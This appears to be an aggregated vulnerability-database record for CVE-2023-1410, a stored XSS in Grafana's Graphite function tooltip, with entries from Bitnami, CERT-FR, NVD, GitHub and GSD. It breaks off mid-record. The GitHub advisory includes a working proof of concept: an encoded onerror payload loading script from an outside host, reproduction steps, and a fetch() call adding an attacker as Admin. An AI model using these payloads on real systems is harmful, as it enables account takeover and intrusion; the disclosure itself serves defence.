"\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 4,7)\n\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 4,8)"
}
bit-grafana-2023-1410
Vulnerability from bitnami_vulndb
Published
2024-03-06 10:53
Modified
2025-05-20 10:02
Summary
Stored XSS in Graphite FunctionDescription tooltip
Details
Grafana is an open-source platform for monitoring and observability.
Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.
The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.
An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.
Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.
{
"affected": [
{
"package": {
"ecosystem": "Bitnami",
"name": "grafana",
"purl": "pkg:bitnami/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.5.22"
},
{
"introduced": "9.2.0"
},
{
"fixed": "9.2.15"
},
{
"introduced": "9.3.0"
},
{
"fixed": "9.3.11"
}
],
"type": "SEMVER"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
],
"aliases": [
"CVE-2023-1410"
],
"database_specific": {
"cpes": [
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*"
],
"severity": "Medium"
},
"details": "Grafana is an open-source platform for monitoring and observability.\u00a0\n\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \n\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\n\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u00a0\n\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.",
"id": "BIT-grafana-2023-1410",
"modified": "2025-05-20T10:02:07.006Z",
"published": "2024-03-06T10:53:49.160Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2023-1410/"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20230420-0003/"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1410"
}
],
"schema_version": "1.5.0",
"summary": "Stored XSS in Graphite FunctionDescription tooltip"
}
CERTFR-2023-AVI-0257
Vulnerability from certfr_avis - Published: 2023-03-23 - Updated: 2023-03-23
Une vulnérabilité a été découverte dans Grafana. Elle permet à un attaquant de provoquer une injection de code indirecte à distance (XSS).
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Grafana Labs | Grafana | Grafana versions 9.3.x antérieures à 9.3.11 | ||
| Grafana Labs | Grafana | Grafana versions 9.4.x antérieures à 9.4.7 | ||
| Grafana Labs | Grafana | Grafana versions 8.5.x antérieures à 8.5.22 | ||
| Grafana Labs | Grafana | Grafana versions 9.2.x antérieures à 9.2.15 |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Grafana versions 9.3.x ant\u00e9rieures \u00e0 9.3.11",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 9.4.x ant\u00e9rieures \u00e0 9.4.7",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 8.5.x ant\u00e9rieures \u00e0 8.5.22",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 9.2.x ant\u00e9rieures \u00e0 9.2.15",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-1410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1410"
}
],
"initial_release_date": "2023-03-23T00:00:00",
"last_revision_date": "2023-03-23T00:00:00",
"links": [],
"reference": "CERTFR-2023-AVI-0257",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2023-03-23T00:00:00.000000"
}
],
"risks": [
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
}
],
"summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans Grafana. Elle permet \u00e0 un\nattaquant de provoquer une injection de code indirecte \u00e0 distance (XSS).\n",
"title": "Vuln\u00e9rabilit\u00e9 dans Grafana",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Grafana du 22 mars 2023",
"url": "https://grafana.com/blog/2023/03/22/grafana-security-release-new-versions-with-security-fixes-for-cve-2023-1410/"
}
]
}
CERTFR-2023-AVI-0351
Vulnerability from certfr_avis - Published: 2023-05-03 - Updated: 2023-05-03
De multiples vulnérabilités ont été découvertes dans GitLab. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un contournement de la politique de sécurité et une atteinte à l'intégrité des données.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "GitLab Community Edition (CE) and Enterprise Edition (EE) versions ant\u00e9rieures \u00e0 15.11.1, 15.10.5 et 15.9.6",
"product": {
"name": "N/A",
"vendor": {
"name": "GitLab",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-0805",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0805"
},
{
"name": "CVE-2023-1836",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1836"
},
{
"name": "CVE-2023-0464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0464"
},
{
"name": "CVE-2023-1410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1410"
},
{
"name": "CVE-2022-4376",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4376"
},
{
"name": "CVE-2023-1178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1178"
},
{
"name": "CVE-2023-1965",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1965"
},
{
"name": "CVE-2023-2182",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2182"
},
{
"name": "CVE-2023-2069",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2069"
},
{
"name": "CVE-2023-1621",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1621"
},
{
"name": "CVE-2023-0756",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0756"
}
],
"initial_release_date": "2023-05-03T00:00:00",
"last_revision_date": "2023-05-03T00:00:00",
"links": [],
"reference": "CERTFR-2023-AVI-0351",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2023-05-03T00:00:00.000000"
}
],
"risks": [
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans GitLab. Certaines\nd\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de\ncode arbitraire \u00e0 distance, un contournement de la politique de s\u00e9curit\u00e9\net une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans GitLab",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 GitLab du 02 mai 2023",
"url": "https://about.gitlab.com/releases/2023/05/02/security-release-gitlab-15-11-1-released/"
}
]
}
FKIE_CVE-2023-1410
Vulnerability from fkie_nvd - Published: 2023-03-23 08:15 - Updated: 2025-02-13 17:15
Severity
6.2 (Medium) - CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N
4.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Summary
Grafana is an open-source platform for monitoring and observability.
Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.
The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.
An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.
Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F7482331-D381-4704-BF90-060DB1E279C1",
"versionEndExcluding": "8.5.22",
"versionStartIncluding": "8.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "79D0AE4D-AD37-45A8-A84B-FE675F2D2943",
"versionEndExcluding": "9.2.15",
"versionStartIncluding": "9.2.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3D6B0083-7414-4C30-9C14-B4C4784F79DB",
"versionEndExcluding": "9.3.11",
"versionStartExcluding": "9.3.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Grafana is an open-source platform for monitoring and observability.\u00a0\n\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \n\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\n\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u00a0\n\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix."
}
],
"id": "CVE-2023-1410",
"lastModified": "2025-02-13T17:15:58.630",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 4.7,
"source": "security@grafana.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-03-23T08:15:12.470",
"references": [
{
"source": "security@grafana.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76"
},
{
"source": "security@grafana.com",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-1410/"
},
{
"source": "security@grafana.com",
"url": "https://security.netapp.com/advisory/ntap-20230420-0003/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-1410/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://security.netapp.com/advisory/ntap-20230420-0003/"
}
],
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security@grafana.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-QRRG-GW7W-VP76
Vulnerability from github – Published: 2023-03-23 20:10 – Updated: 2023-03-23 20:10
VLAI
Summary
Grafana Stored Cross-site Scripting in Graphite FunctionDescription tooltip
Details
Summary
When a Graphite data source is added, one can use this data source in a dashboard. This contains a feature to use Functions. Once a function is selected, a small tooltip will be shown when hovering over the name of the function. This tooltip will allow you to delete the selected Function from your query or show the Function Description. However, no sanitization is done when adding this description to the DOM. Since it is not uncommon to connect to public data sources, and attacker could host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker controlled XSS payload will be executed. This can be used to add the attacker as an Admin for example.
Details
- Spin up your own Graphite instance. I've done this using the
make devenv sources=graphite. - Now start a terminal for your Graphite container and modify the following file
/opt/graphite/webapp/graphite/render/functions.py - Basically you can pick any function but I picked the
aggregateSeriesListsfunction. Modify its description to be"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
The result would look like this:
def aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos, func, xFilesFactor=None):
"""
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
"""
if len(seriesListFirstPos) != len(seriesListSecondPos):
raise InputParameterError(
"seriesListFirstPos and seriesListSecondPos argument must have equal length")
results = []
for i in range(0, len(seriesListFirstPos)):
firstSeries = seriesListFirstPos[i]
secondSeries = seriesListSecondPos[i]
aggregated = aggregate(requestContext, (firstSeries, secondSeries), func, xFilesFactor=xFilesFactor)
if not aggregated: # empty list, no data found
continue
result = aggregated[0] # aggregate() can only return len 1 list
result.name = result.name[:result.name.find('Series(')] + 'Series(%s,%s)' % (firstSeries.name, secondSeries.name)
results.append(result)
return results
aggregateSeriesLists.group = 'Combine'
aggregateSeriesLists.params = [
Param('seriesListFirstPos', ParamTypes.seriesList, required=True),
Param('seriesListSecondPos', ParamTypes.seriesList, required=True),
Param('func', ParamTypes.aggFunc, required=True),
Param('xFilesFactor', ParamTypes.float),
]
- Save and quit the file. Restart your Graphite Container (I did this using the Restart Icon in Docker Desktop)
- Now login to your Grafana instance as an Organisation Admin.
- Navigate to http://[grafana]/plugins/graphite and click
Create a Graphite data source - Add the url to the attackers Graphite instance (maybe enable
Skip TLS Verify) and clickSave & testandExplore - In the newly opened page click the + icon next to
Functionsand search foraggregateSeriesListsand click it to add it. - Now hover over
aggregateSeriesListswith your mouse and move your mouse to the?icon.
Result
Our payload will trigger and in this case it will include an external script to trigger the alerts.
Decoded payload
var a=document.createElement("script");a.src="https://cm2.tel";document.body.appendChild(a);
Impact
In the POC we've picked 1 function to have a XSS payload, but a real attacker would of course maximize the likelihood by replacing all of it's descriptions with XSS payloads. As shown above the attacker can now run arbitrary javascript in the browser of the victim. The victim can be any user using the malicious Graphite instance in a query (or while Exploring), including the Organisation Admin. If so, an attacker could include a payload to add them as an admin themselves.
An example would be something like this:
fetch("/api/org/invites", {
"headers": {
"content-type": "application/json"
},
"body": "{\"name\":\"\",\"email\":\"\",\"role\":\"Admin\",\"sendEmail\":true,\"loginOrEmail\":\"hacker@hacker.com\"}",
"method": "POST",
"credentials": "include"
});
Mitigation
The vulnerability seems to occur in the following file: public\app\plugins\datasource\graphite\components\FunctionEditorControls.tsx
const FunctionDescription = React.lazy(async () => {
// @ts-ignore
const { default: rst2html } = await import(/* webpackChunkName: "rst2html" */ 'rst2html');
return {
default(props: { description?: string }) {
return <div dangerouslySetInnerHTML={{ __html: rst2html(props.description ?? '') }} />;
},
};
});
In many other similar cases, some form of sanitization is used. I would advise to use the same here as rst2html itself will just leave HTML untouched when parsing the expected reStructuredText from Graphite. So now when it is applied using dangerouslySetInnerHTML our XSS payload will survive.
Severity
6.2 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.5.22"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.3.0"
},
{
"fixed": "9.3.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.4.0"
},
{
"fixed": "9.4.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.2.15"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-1410"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-23T20:10:47Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nWhen a Graphite data source is added, one can use this data source in a dashboard. This contains a feature to use `Functions`. Once a function is selected, a small tooltip will be shown when hovering over the name of the function. This tooltip will allow you to delete the selected Function from your query or show the Function Description. However, no sanitization is done when adding this description to the DOM. Since it is not uncommon to connect to public data sources, and attacker could host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker controlled XSS payload will be executed. This can be used to add the attacker as an Admin for example. \n\n### Details\n\n1. Spin up your own Graphite instance. I\u0027ve done this using the `make devenv sources=graphite`.\n2. Now start a terminal for your Graphite container and modify the following file `/opt/graphite/webapp/graphite/render/functions.py` \n3. Basically you can pick any function but I picked the `aggregateSeriesLists` function. Modify its description to be `\"\u003e\u003cimg src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))\u003e`\n\nThe result would look like this:\n\n```python\ndef aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos, func, xFilesFactor=None):\n \"\"\" \n \n \"\u003e\u003cimg src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))\u003e\n \n \"\"\" \n if len(seriesListFirstPos) != len(seriesListSecondPos): \n raise InputParameterError( \n \"seriesListFirstPos and seriesListSecondPos argument must have equal length\")\n results = [] \n \n for i in range(0, len(seriesListFirstPos)): \n firstSeries = seriesListFirstPos[i] \n secondSeries = seriesListSecondPos[i] \n aggregated = aggregate(requestContext, (firstSeries, secondSeries), func, xFilesFactor=xFilesFactor) \n if not aggregated: # empty list, no data found \n continue \n result = aggregated[0] # aggregate() can only return len 1 list \n result.name = result.name[:result.name.find(\u0027Series(\u0027)] + \u0027Series(%s,%s)\u0027 % (firstSeries.name, secondSeries.name)\n results.append(result) \n return results \n \n \naggregateSeriesLists.group = \u0027Combine\u0027 \naggregateSeriesLists.params = [\n Param(\u0027seriesListFirstPos\u0027, ParamTypes.seriesList, required=True),\n Param(\u0027seriesListSecondPos\u0027, ParamTypes.seriesList, required=True),\n Param(\u0027func\u0027, ParamTypes.aggFunc, required=True), \n Param(\u0027xFilesFactor\u0027, ParamTypes.float), \n] \n```\n\n4. Save and quit the file. Restart your Graphite Container (I did this using the Restart Icon in Docker Desktop)\n5. Now login to your Grafana instance as an Organisation Admin.\n6. Navigate to http://[grafana]/plugins/graphite and click `Create a Graphite data source`\n7. Add the url to the attackers Graphite instance (maybe enable `Skip TLS Verify`) and click `Save \u0026 test` and `Explore`\n8. In the newly opened page click the + icon next to `Functions` and search for `aggregateSeriesLists` and click it to add it.\n9. Now hover over `aggregateSeriesLists` with your mouse and move your mouse to the `?` icon.\n\n### Result\n\nOur payload will trigger and in this case it will include an external script to trigger the alerts.\n\n#### Decoded payload\n\n```javascript\nvar a=document.createElement(\"script\");a.src=\"https://cm2.tel\";document.body.appendChild(a);\n```\n\n\n\n\n### Impact\n\nIn the POC we\u0027ve picked 1 function to have a XSS payload, but a real attacker would of course maximize the likelihood by replacing all of it\u0027s descriptions with XSS payloads. As shown above the attacker can now run arbitrary javascript in the browser of the victim. The victim can be any user using the malicious Graphite instance in a query (or while Exploring), including the Organisation Admin. If so, an attacker could include a payload to add them as an admin themselves.\n\nAn example would be something like this:\n\n```javascript\nfetch(\"/api/org/invites\", {\n \"headers\": {\n \"content-type\": \"application/json\"\n },\n \"body\": \"{\\\"name\\\":\\\"\\\",\\\"email\\\":\\\"\\\",\\\"role\\\":\\\"Admin\\\",\\\"sendEmail\\\":true,\\\"loginOrEmail\\\":\\\"hacker@hacker.com\\\"}\",\n \"method\": \"POST\",\n \"credentials\": \"include\"\n});\n```\n\n### Mitigation\n\nThe vulnerability seems to occur in the following file: public\\app\\plugins\\datasource\\graphite\\components\\FunctionEditorControls.tsx\n\n```typescript\nconst FunctionDescription = React.lazy(async () =\u003e {\n // @ts-ignore\n const { default: rst2html } = await import(/* webpackChunkName: \"rst2html\" */ \u0027rst2html\u0027);\n return {\n default(props: { description?: string }) {\n return \u003cdiv dangerouslySetInnerHTML={{ __html: rst2html(props.description ?? \u0027\u0027) }} /\u003e;\n },\n };\n});\n```\n\nIn many other similar cases, some form of sanitization is used. I would advise to use the same here as rst2html itself will just leave HTML untouched when parsing the expected reStructuredText from Graphite. So now when it is applied using dangerouslySetInnerHTML our XSS payload will survive.",
"id": "GHSA-qrrg-gw7w-vp76",
"modified": "2023-03-23T20:10:47Z",
"published": "2023-03-23T20:10:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1410"
},
{
"type": "WEB",
"url": "https://github.com/grafana/grafana/commit/42911348a76e8484396b951bef8b7bff97a84cbc"
},
{
"type": "WEB",
"url": "https://github.com/grafana/grafana/commit/e59427c0747ae2f3feb1bfc3a4b87f0886208cc6"
},
{
"type": "WEB",
"url": "https://github.com/grafana/grafana/commit/ef2eb2b6bf1d7c0fb781e3e05d0d1aecd6dd438a"
},
{
"type": "WEB",
"url": "https://github.com/grafana/grafana/commit/f9548d33f8624d6694983fe5aad181007405be8a"
},
{
"type": "PACKAGE",
"url": "https://github.com/grafana/grafana"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2023-1410"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Grafana Stored Cross-site Scripting in Graphite FunctionDescription tooltip"
}
GSD-2023-1410
Vulnerability from gsd - Updated: 2023-12-13 01:20Details
Grafana is an open-source platform for monitoring and observability.
Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.
The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.
An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.
Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2023-1410",
"id": "GSD-2023-1410"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2023-1410"
],
"details": "Grafana is an open-source platform for monitoring and observability.\u00a0\n\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \n\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\n\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u00a0\n\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix. \n\n\n\n\n\n\n\n\n\n\n",
"id": "GSD-2023-1410",
"modified": "2023-12-13T01:20:41.985210Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security@grafana.com",
"ID": "CVE-2023-1410",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Grafana",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "8.0.0",
"version_value": "8.5.22"
},
{
"version_affected": "\u003c",
"version_name": "9.0.0",
"version_value": "9.2.15"
},
{
"version_affected": "\u003c",
"version_name": "9.3.0",
"version_value": "9.3.11"
}
]
}
},
{
"product_name": "Grafana Enterprise",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "8.0.0",
"version_value": "8.5.22"
},
{
"version_affected": "\u003c",
"version_name": "9.0.0",
"version_value": "9.2.15"
},
{
"version_affected": "\u003c",
"version_name": "9.3.0",
"version_value": "9.3.11"
}
]
}
}
]
},
"vendor_name": "Grafana"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Grafana is an open-source platform for monitoring and observability.\u00a0\n\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \n\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\n\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u00a0\n\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix. \n\n\n\n\n\n\n\n\n\n\n"
}
]
},
"generator": {
"engine": "Vulnogram 0.1.0-dev"
},
"impact": {
"cvss": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-79",
"lang": "eng",
"value": "CWE-79"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://grafana.com/security/security-advisories/cve-2023-1410/",
"refsource": "MISC",
"url": "https://grafana.com/security/security-advisories/cve-2023-1410/"
},
{
"name": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76",
"refsource": "MISC",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76"
},
{
"name": "https://security.netapp.com/advisory/ntap-20230420-0003/",
"refsource": "MISC",
"url": "https://security.netapp.com/advisory/ntap-20230420-0003/"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
},
"gitlab.com": {
